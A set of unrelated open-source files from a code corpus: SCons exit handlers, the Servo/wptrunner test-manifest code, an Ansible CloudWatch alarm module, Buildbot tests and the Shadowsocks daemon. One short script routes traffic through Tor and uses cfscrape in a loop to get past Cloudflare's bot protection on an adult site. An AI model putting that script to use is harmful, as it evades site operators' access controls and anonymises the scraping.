__revision__ = "src/engine/SCons/exitfuncs.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
_exithandlers = []
def _run_exitfuncs():
"""run any registered exit functions
_exithandlers is traversed in reverse order so functions are executed
last in, first out.
"""
while _exithandlers:
func, targs, kargs = _exithandlers.pop()
func(*targs, **kargs)
def register(func, *targs, **kargs):
"""register a function to be executed upon normal program termination
func - function to be called at exit
targs - optional arguments to pass to func
kargs - optional keyword arguments to pass to func
"""
_exithandlers.append((func, targs, kargs))
import sys
try:
x = sys.exitfunc
# if x isn't our own exit func executive, assume it's another
# registered exit function - append it to our list...
if x != _run_exitfuncs:
register(x)
except AttributeError:
pass
# make our exit function get run by python when it exits:
sys.exitfunc = _run_exitfuncs
del sys
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| bsd-3-clause |
gpoesia/servo | tests/wpt/harness/wptrunner/manifestupdate.py | 116 | 17251 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import urlparse
from collections import namedtuple, defaultdict
from wptmanifest.node import (DataNode, ConditionalNode, BinaryExpressionNode,
BinaryOperatorNode, VariableNode, StringNode, NumberNode,
UnaryExpressionNode, UnaryOperatorNode, KeyValueNode)
from wptmanifest.backends import conditional
from wptmanifest.backends.conditional import ManifestItem
import expected
"""Manifest structure used to update the expected results of a test
Each manifest file is represented by an ExpectedManifest that has one
or more TestNode children, one per test in the manifest. Each
TestNode has zero or more SubtestNode children, one for each known
subtest of the test.
In these representations, conditionals expressions in the manifest are
not evaluated upfront but stored as python functions to be evaluated
at runtime.
When a result for a test is to be updated set_result on the
[Sub]TestNode is called to store the new result, alongside the
existing conditional that result's run info matched, if any. Once all
new results are known, coalesce_expected is called to compute the new
set of results and conditionals. The AST of the underlying parsed manifest
is updated with the changes, and the result is serialised to a file.
"""
Result = namedtuple("Result", ["run_info", "status"])
def data_cls_getter(output_node, visited_node):
# visited_node is intentionally unused
if output_node is None:
return ExpectedManifest
elif isinstance(output_node, ExpectedManifest):
return TestNode
elif isinstance(output_node, TestNode):
return SubtestNode
else:
raise ValueError
class ExpectedManifest(ManifestItem):
def __init__(self, node, test_path=None, url_base=None, property_order=None,
boolean_properties=None):
"""Object representing all the tests in a particular manifest
:param node: AST Node associated with this object. If this is None,
a new AST is created to associate with this manifest.
:param test_path: Path of the test file associated with this manifest.
:param url_base: Base url for serving the tests in this manifest.
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
if node is None:
node = DataNode(None)
ManifestItem.__init__(self, node)
self.child_map = {}
self.test_path = test_path
self.url_base = url_base
assert self.url_base is not None
self.modified = False
self.boolean_properties = boolean_properties
self.property_order = property_order
def append(self, child):
ManifestItem.append(self, child)
if child.id in self.child_map:
print "Warning: Duplicate heading %s" % child.id
self.child_map[child.id] = child
def _remove_child(self, child):
del self.child_map[child.id]
ManifestItem._remove_child(self, child)
def get_test(self, test_id):
"""Return a TestNode by test id, or None if no test matches
:param test_id: The id of the test to look up"""
return self.child_map[test_id]
def has_test(self, test_id):
"""Boolean indicating whether the current test has a known child test
with id test id
:param test_id: The id of the test to look up"""
return test_id in self.child_map
@property
def url(self):
return urlparse.urljoin(self.url_base,
"/".join(self.test_path.split(os.path.sep)))
class TestNode(ManifestItem):
def __init__(self, node):
"""Tree node associated with a particular test in a manifest
:param node: AST node associated with the test"""
ManifestItem.__init__(self, node)
self.updated_expected = []
self.new_expected = []
self.subtests = {}
self.default_status = None
self._from_file = True
@classmethod
def create(cls, test_type, test_id):
"""Create a TestNode corresponding to a given test
:param test_type: The type of the test
:param test_id: The id of the test"""
url = test_id
name = url.split("/")[-1]
node = DataNode(name)
self = cls(node)
self.set("type", test_type)
self._from_file = False
return self
@property
def is_empty(self):
required_keys = set(["type"])
if set(self._data.keys()) != required_keys:
return False
return all(child.is_empty for child in self.children)
@property
def test_type(self):
"""The type of the test represented by this TestNode"""
return self.get("type", None)
@property
def id(self):
"""The id of the test represented by this TestNode"""
return urlparse.urljoin(self.parent.url, self.name)
def disabled(self, run_info):
"""Boolean indicating whether this test is disabled when run in an
environment with the given run_info
:param run_info: Dictionary of run_info parameters"""
return self.get("disabled", run_info) is not None
def set_result(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Status of the test in this run"""
if self.default_status is not None:
assert self.default_status == result.default_expected
else:
self.default_status = result.default_expected
# Add this result to the list of results satisfying
# any condition in the list of updated results it matches
for (cond, values) in self.updated_expected:
if cond(run_info):
values.append(Result(run_info, result.status))
if result.status != cond.value:
self.root.modified = True
break
else:
# We didn't find a previous value for this
self.new_expected.append(Result(run_info, result.status))
self.root.modified = True
def coalesce_expected(self):
"""Update the underlying manifest AST for this test based on all the
added results.
This will update existing conditionals if they got the same result in
all matching runs in the updated results, will delete existing conditionals
that get more than one different result in the updated run, and add new
conditionals for anything that doesn't match an existing conditional.
Conditionals not matched by any added result are not changed."""
final_conditionals = []
try:
unconditional_status = self.get("expected")
except KeyError:
unconditional_status = self.default_status
for conditional_value, results in self.updated_expected:
if not results:
# The conditional didn't match anything in these runs so leave it alone
final_conditionals.append(conditional_value)
elif all(results[0].status == result.status for result in results):
# All the new values for this conditional matched, so update the node
result = results[0]
if (result.status == unconditional_status and
conditional_value.condition_node is not None):
self.remove_value("expected", conditional_value)
else:
conditional_value.value = result.status
final_conditionals.append(conditional_value)
elif conditional_value.condition_node is not None:
# Blow away the existing condition and rebuild from scratch
# This isn't sure to work if we have a conditional later that matches
# these values too, but we can hope, verify that we get the results
# we expect, and if not let a human sort it out
self.remove_value("expected", conditional_value)
self.new_expected.extend(results)
elif conditional_value.condition_node is None:
self.new_expected.extend(result for result in results
if result.status != unconditional_status)
# It is an invariant that nothing in new_expected matches an existing
# condition except for the default condition
if self.new_expected:
if all(self.new_expected[0].status == result.status
for result in self.new_expected) and not self.updated_expected:
status = self.new_expected[0].status
if status != self.default_status:
self.set("expected", status, condition=None)
final_conditionals.append(self._data["expected"][-1])
else:
for conditional_node, status in group_conditionals(
self.new_expected,
property_order=self.root.property_order,
boolean_properties=self.root.boolean_properties):
if status != unconditional_status:
self.set("expected", status, condition=conditional_node.children[0])
final_conditionals.append(self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) > 0 and
self._data["expected"][-1].condition_node is None and
self._data["expected"][-1].value == self.default_status):
self.remove_value("expected", self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) == 0):
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
break
def _add_key_value(self, node, values):
ManifestItem._add_key_value(self, node, values)
if node.data == "expected":
self.updated_expected = []
for value in values:
self.updated_expected.append((value, []))
def clear_expected(self):
"""Clear all the expected data for this test and all of its subtests"""
self.updated_expected = []
if "expected" in self._data:
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
del self._data["expected"]
break
for subtest in self.subtests.itervalues():
subtest.clear_expected()
def append(self, node):
child = ManifestItem.append(self, node)
self.subtests[child.name] = child
def get_subtest(self, name):
"""Return a SubtestNode corresponding to a particular subtest of
the current test, creating a new one if no subtest with that name
already exists.
:param name: Name of the subtest"""
if name in self.subtests:
return self.subtests[name]
else:
subtest = SubtestNode.create(name)
self.append(subtest)
return subtest
class SubtestNode(TestNode):
def __init__(self, node):
assert isinstance(node, DataNode)
TestNode.__init__(self, node)
@classmethod
def create(cls, name):
node = DataNode(name)
self = cls(node)
return self
@property
def is_empty(self):
if self._data:
return False
return True
def group_conditionals(values, property_order=None, boolean_properties=None):
"""Given a list of Result objects, return a list of
(conditional_node, status) pairs representing the conditional
expressions that are required to match each status
:param values: List of Results
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
by_property = defaultdict(set)
for run_info, status in values:
for prop_name, prop_value in run_info.iteritems():
by_property[(prop_name, prop_value)].add(status)
if property_order is None:
property_order = ["debug", "os", "version", "processor", "bits"]
if boolean_properties is None:
boolean_properties = set(["debug"])
else:
boolean_properties = set(boolean_properties)
# If we have more than one value, remove any properties that are common
# for all the values
if len(values) > 1:
for key, statuses in by_property.copy().iteritems():
if len(statuses) == len(values):
del by_property[key]
properties = set(item[0] for item in by_property.iterkeys())
include_props = []
for prop in property_order:
if prop in properties:
include_props.append(prop)
conditions = {}
for run_info, status in values:
prop_set = tuple((prop, run_info[prop]) for prop in include_props)
if prop_set in conditions:
continue
expr = make_expr(prop_set, status, boolean_properties=boolean_properties)
conditions[prop_set] = (expr, status)
return conditions.values()
def make_expr(prop_set, status, boolean_properties=None):
"""Create an AST that returns the value ``status`` given all the
properties in prop_set match.
:param prop_set: tuple of (property name, value) pairs for each
property in this expression and the value it must match
:param status: Status on RHS when all the given properties match
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
root = ConditionalNode()
assert len(prop_set) > 0
expressions = []
for prop, value in prop_set:
number_types = (int, float, long)
value_cls = (NumberNode
if type(value) in number_types
else StringNode)
if prop not in boolean_properties:
expressions.append(
BinaryExpressionNode(
BinaryOperatorNode("=="),
VariableNode(prop),
value_cls(unicode(value))
))
else:
if value:
expressions.append(VariableNode(prop))
else:
expressions.append(
UnaryExpressionNode(
UnaryOperatorNode("not"),
VariableNode(prop)
))
if len(expressions) > 1:
prev = expressions[-1]
for curr in reversed(expressions[:-1]):
node = BinaryExpressionNode(
BinaryOperatorNode("and"),
curr,
prev)
prev = node
else:
node = expressions[0]
root.append(node)
root.append(StringNode(status))
return root
def get_manifest(metadata_root, test_path, url_base, property_order=None,
boolean_properties=None):
"""Get the ExpectedManifest for a particular test path, or None if there is no
metadata stored for that test path.
:param metadata_root: Absolute path to the root of the metadata directory
:param test_path: Path to the test(s) relative to the test root
:param url_base: Base url for serving the tests in this manifest
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
manifest_path = expected.expected_path(metadata_root, test_path)
try:
with open(manifest_path) as f:
return compile(f, test_path, url_base, property_order=property_order,
boolean_properties=boolean_properties)
except IOError:
return None
def compile(manifest_file, test_path, url_base, property_order=None,
boolean_properties=None):
return conditional.compile(manifest_file,
data_cls_getter=data_cls_getter,
test_path=test_path,
url_base=url_base,
property_order=property_order,
boolean_properties=boolean_properties)
| mpl-2.0 |
LorneWu/e-Gental-downloader | note tor_try_cloudflare_fail.py | 1 | 1111 | import socks
import socket
from urllib.request import urlopen
import requests
import header_s
import time
from bs4 import BeautifulSoup
socks.set_default_proxy(socks.SOCKS5, "localhost", 9050)
socket.socket = socks.socksocket
print(requests.get('http://icanhazip.com').text)
print(urlopen('http://icanhazip.com').read())
url = 'https://e-hentai.org/?f_doujinshi=1&f_manga=1&f_artistcg=1&f_gamecg=1&f_western=1&f_non-h=1&f_imageset=1&f_cosplay=1&f_asianporn=1&f_misc=1&f_search=Miyuko&f_apply=Apply+Filter'
header_s.getprofile()
import cfscrape
while True:
try:
scraper = cfscrape.create_scraper() # returns a CloudflareScraper instance
# Or: scraper = cfscrape.CloudflareScraper() # CloudflareScraper inherits from requests.Session
print(scraper.get(url,headers = header_s.file_1))
html=scraper.get(url,headers = header_s.file_1)# requests.get(url,headers = header_s.file_1)
#print(html.text)
except Exception as e:
print(e)
else:
sp = BeautifulSoup(html.text,'html.parser')
print(sp.select('title'))
time.sleep(10) | gpl-3.0 |
aperigault/ansible | lib/ansible/modules/cloud/amazon/ec2_metric_alarm.py | 11 | 12566 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = """
module: ec2_metric_alarm
short_description: "Create/update or delete AWS Cloudwatch 'metric alarms'"
description:
- Can create or delete AWS metric alarms.
- Metrics you wish to alarm on must already exist.
version_added: "1.6"
author: "Zacharie Eakin (@Zeekin)"
options:
state:
description:
- register or deregister the alarm
required: true
choices: ['present', 'absent']
name:
description:
- Unique name for the alarm
required: true
metric:
description:
- Name of the monitored metric (e.g. CPUUtilization)
- Metric must already exist
required: false
namespace:
description:
- Name of the appropriate namespace ('AWS/EC2', 'System/Linux', etc.), which determines the category it will appear under in cloudwatch
required: false
statistic:
description:
- Operation applied to the metric
- Works in conjunction with period and evaluation_periods to determine the comparison value
required: false
choices: ['SampleCount','Average','Sum','Minimum','Maximum']
comparison:
description:
- Determines how the threshold value is compared
required: false
choices: ['<=','<','>','>=']
threshold:
description:
- Sets the min/max bound for triggering the alarm
required: false
period:
description:
- The time (in seconds) between metric evaluations
required: false
evaluation_periods:
description:
- The number of times in which the metric is evaluated before final calculation
required: false
unit:
description:
- The threshold's unit of measurement
required: false
choices:
- 'Seconds'
- 'Microseconds'
- 'Milliseconds'
- 'Bytes'
- 'Kilobytes'
- 'Megabytes'
- 'Gigabytes'
- 'Terabytes'
- 'Bits'
- 'Kilobits'
- 'Megabits'
- 'Gigabits'
- 'Terabits'
- 'Percent'
- 'Count'
- 'Bytes/Second'
- 'Kilobytes/Second'
- 'Megabytes/Second'
- 'Gigabytes/Second'
- 'Terabytes/Second'
- 'Bits/Second'
- 'Kilobits/Second'
- 'Megabits/Second'
- 'Gigabits/Second'
- 'Terabits/Second'
- 'Count/Second'
- 'None'
description:
description:
- A longer description of the alarm
required: false
dimensions:
description:
- Describes to what the alarm is applied
required: false
alarm_actions:
description:
- A list of the names action(s) taken when the alarm is in the 'alarm' status, denoted as Amazon Resource Name(s)
required: false
insufficient_data_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'insufficient_data' status
required: false
ok_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'ok' status, denoted as Amazon Resource Name(s)
required: false
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
- name: create alarm
ec2_metric_alarm:
state: present
region: ap-southeast-2
name: "cpu-low"
metric: "CPUUtilization"
namespace: "AWS/EC2"
statistic: Average
comparison: "<="
threshold: 5.0
period: 300
evaluation_periods: 3
unit: "Percent"
description: "This will alarm when a bamboo slave's cpu usage average is lower than 5% for 15 minutes "
dimensions: {'InstanceId':'i-XXX'}
alarm_actions: ["action1","action2"]
- name: Create an alarm to recover a failed instance
ec2_metric_alarm:
state: present
region: us-west-1
name: "recover-instance"
metric: "StatusCheckFailed_System"
namespace: "AWS/EC2"
statistic: "Minimum"
comparison: ">="
threshold: 1.0
period: 60
evaluation_periods: 2
unit: "Count"
description: "This will recover an instance when it fails"
dimensions: {"InstanceId":'i-XXX'}
alarm_actions: ["arn:aws:automate:us-west-1:ec2:recover"]
'''
try:
import boto.ec2.cloudwatch
from boto.ec2.cloudwatch import MetricAlarm
from boto.exception import BotoServerError, NoAuthHandlerFound
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (AnsibleAWSError, HAS_BOTO, connect_to_aws, ec2_argument_spec,
get_aws_connection_info)
def create_metric_alarm(connection, module):
name = module.params.get('name')
metric = module.params.get('metric')
namespace = module.params.get('namespace')
statistic = module.params.get('statistic')
comparison = module.params.get('comparison')
threshold = module.params.get('threshold')
period = module.params.get('period')
evaluation_periods = module.params.get('evaluation_periods')
unit = module.params.get('unit')
description = module.params.get('description')
dimensions = module.params.get('dimensions')
alarm_actions = module.params.get('alarm_actions')
insufficient_data_actions = module.params.get('insufficient_data_actions')
ok_actions = module.params.get('ok_actions')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if not alarms:
alm = MetricAlarm(
name=name,
metric=metric,
namespace=namespace,
statistic=statistic,
comparison=comparison,
threshold=threshold,
period=period,
evaluation_periods=evaluation_periods,
unit=unit,
description=description,
dimensions=dimensions,
alarm_actions=alarm_actions,
insufficient_data_actions=insufficient_data_actions,
ok_actions=ok_actions
)
try:
connection.create_alarm(alm)
changed = True
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to create alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
else:
alarm = alarms[0]
changed = False
for attr in ('comparison', 'metric', 'namespace', 'statistic', 'threshold', 'period', 'evaluation_periods', 'unit', 'description'):
if getattr(alarm, attr) != module.params.get(attr):
changed = True
setattr(alarm, attr, module.params.get(attr))
# this is to deal with a current bug where you cannot assign '<=>' to the comparator when modifying an existing alarm
comparison = alarm.comparison
comparisons = {'<=': 'LessThanOrEqualToThreshold', '<': 'LessThanThreshold', '>=': 'GreaterThanOrEqualToThreshold', '>': 'GreaterThanThreshold'}
alarm.comparison = comparisons[comparison]
dim1 = module.params.get('dimensions')
dim2 = alarm.dimensions
for keys in dim1:
if not isinstance(dim1[keys], list):
dim1[keys] = [dim1[keys]]
if keys not in dim2 or dim1[keys] != dim2[keys]:
changed = True
setattr(alarm, 'dimensions', dim1)
for attr in ('alarm_actions', 'insufficient_data_actions', 'ok_actions'):
action = module.params.get(attr) or []
# Boto and/or ansible may provide same elements in lists but in different order.
# Compare on sets since they do not need any order.
if set(getattr(alarm, attr)) != set(action):
changed = True
setattr(alarm, attr, module.params.get(attr))
try:
if changed:
connection.create_alarm(alarm)
except BotoServerError as e:
module.fail_json(msg=str(e))
result = alarms[0]
module.exit_json(changed=changed, name=result.name,
actions_enabled=result.actions_enabled,
alarm_actions=result.alarm_actions,
alarm_arn=result.alarm_arn,
comparison=result.comparison,
description=result.description,
dimensions=result.dimensions,
evaluation_periods=result.evaluation_periods,
insufficient_data_actions=result.insufficient_data_actions,
last_updated=result.last_updated,
metric=result.metric,
namespace=result.namespace,
ok_actions=result.ok_actions,
period=result.period,
state_reason=result.state_reason,
state_value=result.state_value,
statistic=result.statistic,
threshold=result.threshold,
unit=result.unit)
def delete_metric_alarm(connection, module):
name = module.params.get('name')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if alarms:
try:
connection.delete_alarms([name])
module.exit_json(changed=True)
except BotoServerError as e:
module.fail_json(msg=str(e))
else:
module.exit_json(changed=False)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(required=True, type='str'),
metric=dict(type='str'),
namespace=dict(type='str'),
statistic=dict(type='str', choices=['SampleCount', 'Average', 'Sum', 'Minimum', 'Maximum']),
comparison=dict(type='str', choices=['<=', '<', '>', '>=']),
threshold=dict(type='float'),
period=dict(type='int'),
unit=dict(type='str', choices=['Seconds', 'Microseconds', 'Milliseconds', 'Bytes', 'Kilobytes', 'Megabytes', 'Gigabytes', 'Terabytes',
'Bits', 'Kilobits', 'Megabits', 'Gigabits', 'Terabits', 'Percent', 'Count', 'Bytes/Second', 'Kilobytes/Second',
'Megabytes/Second', 'Gigabytes/Second', 'Terabytes/Second', 'Bits/Second', 'Kilobits/Second', 'Megabits/Second',
'Gigabits/Second', 'Terabits/Second', 'Count/Second', 'None']),
evaluation_periods=dict(type='int'),
description=dict(type='str'),
dimensions=dict(type='dict', default={}),
alarm_actions=dict(type='list'),
insufficient_data_actions=dict(type='list'),
ok_actions=dict(type='list'),
state=dict(default='present', choices=['present', 'absent']),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.ec2.cloudwatch, region, **aws_connect_params)
except (NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
if state == 'present':
create_metric_alarm(connection, module)
elif state == 'absent':
delete_metric_alarm(connection, module)
if __name__ == '__main__':
main()
| gpl-3.0 |
ulnic/weatherSensor | data/ConfigurationReader.py | 1 | 2775 | #!/usr/bin/python
"""
Configuration Handler
"""
import logging
# noinspection PyCompatibility
import ConfigParser
import data.Constants
logger = logging.getLogger(data.Constants.Constant.LOGGER_NAME)
class ConfigurationReader(object):
"""
Class handling the configuration parser from the configuration.ini file
"""
def __init__(self):
logger.info('Reading configurations from file')
self.parser = ConfigParser.SafeConfigParser()
self.parser.read(data.Constants.Constant.CONFIG_FILE_NAME)
def get_key_in_section(self, _section_name, _key_name):
"""
Retrieves the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The value from the KEY inside the SECTION
"""
return self.parser.get(_section_name, _key_name)
def get_bool_key_in_section(self, _section_name, _key_name):
"""
Retrieves and converts to INTEGER, the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The INTEGER value from the KEY inside the SECTION
"""
return self.parser.getboolean(_section_name, _key_name)
def get_int_key_in_section(self, _section_name, _key_name):
"""
Retrieves and converts to BOOLEAN, the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The BOOLEAN value from the KEY inside the SECTION
"""
return self.parser.getint(_section_name, _key_name)
def get_all_section_names(self):
"""
Returns a list of config section names.
:return: List of all found sections in configuration.ini file.
"""
return [m for m in self.parser.sections()]
def has_sensor_section(self, _section_name):
"""
Queries the config file and return bool indicating if section found
:param _section_name: Section to search for
:return: BOOL indicating if the section was found
"""
return self.parser.has_section(_section_name)
def get_sensor_keys(self, _section_name):
"""
Retrieves all sensor keys under the section
:param _section_name: Section in config file to get keys from
:return: List of found key-values
"""
key_value_dict = {}
for name, value in self.parser.items(_section_name):
key_value_dict[name] = value
return key_value_dict
| mit |
rodrigc/buildbot | master/buildbot/test/unit/util/test_netstrings.py | 6 | 1708 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.protocols import basic
from twisted.trial import unittest
from buildbot.util import netstrings
class NetstringParser(unittest.TestCase):
def test_valid_netstrings(self):
p = netstrings.NetstringParser()
p.feed("5:hello,5:world,")
self.assertEqual(p.strings, [b'hello', b'world'])
def test_valid_netstrings_byte_by_byte(self):
# (this is really testing twisted's support, but oh well)
p = netstrings.NetstringParser()
[p.feed(c) for c in "5:hello,5:world,"]
self.assertEqual(p.strings, [b'hello', b'world'])
def test_invalid_netstring(self):
p = netstrings.NetstringParser()
with self.assertRaises(basic.NetstringParseError):
p.feed("5-hello!")
def test_incomplete_netstring(self):
p = netstrings.NetstringParser()
p.feed("11:hello world,6:foob")
# note that the incomplete 'foobar' does not appear here
self.assertEqual(p.strings, [b'hello world'])
| gpl-2.0 |
kigawas/shadowsocks | shadowsocks/daemon.py | 694 | 5602 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIGHUP, signal.SIG_IGN)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
| apache-2.0 |
simartin/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/wptrunner.py | 1 | 18782 | from __future__ import print_function, unicode_literals
import json
import os
import sys
from six import iteritems, itervalues
import wptserve
from wptserve import sslutils
from . import environment as env
from . import instruments
from . import mpcontext
from . import products
from . import testloader
from . import wptcommandline
from . import wptlogging
from . import wpttest
from mozlog import capture, handlers
from .font import FontInstaller
from .testrunner import ManagerGroup
from .browsers.base import NullBrowser
here = os.path.dirname(__file__)
logger = None
"""Runner for web-platform-tests
The runner has several design goals:
* Tests should run with no modification from upstream.
* Tests should be regarded as "untrusted" so that errors, timeouts and even
crashes in the tests can be handled without failing the entire test run.
* For performance tests can be run in multiple browsers in parallel.
The upstream repository has the facility for creating a test manifest in JSON
format. This manifest is used directly to determine which tests exist. Local
metadata files are used to store the expected test results.
"""
def setup_logging(*args, **kwargs):
global logger
logger = wptlogging.setup(*args, **kwargs)
return logger
def get_loader(test_paths, product, debug=None, run_info_extras=None, chunker_kwargs=None,
test_groups=None, **kwargs):
if run_info_extras is None:
run_info_extras = {}
run_info = wpttest.get_run_info(kwargs["run_info"], product,
browser_version=kwargs.get("browser_version"),
browser_channel=kwargs.get("browser_channel"),
verify=kwargs.get("verify"),
debug=debug,
extras=run_info_extras,
enable_webrender=kwargs.get("enable_webrender"))
test_manifests = testloader.ManifestLoader(test_paths, force_manifest_update=kwargs["manifest_update"],
manifest_download=kwargs["manifest_download"]).load()
manifest_filters = []
include = kwargs["include"]
if test_groups:
include = testloader.update_include_for_groups(test_groups, include)
if include or kwargs["exclude"] or kwargs["include_manifest"] or kwargs["default_exclude"]:
manifest_filters.append(testloader.TestFilter(include=include,
exclude=kwargs["exclude"],
manifest_path=kwargs["include_manifest"],
test_manifests=test_manifests,
explicit=kwargs["default_exclude"]))
ssl_enabled = sslutils.get_cls(kwargs["ssl_type"]).ssl_enabled
h2_enabled = wptserve.utils.http2_compatible()
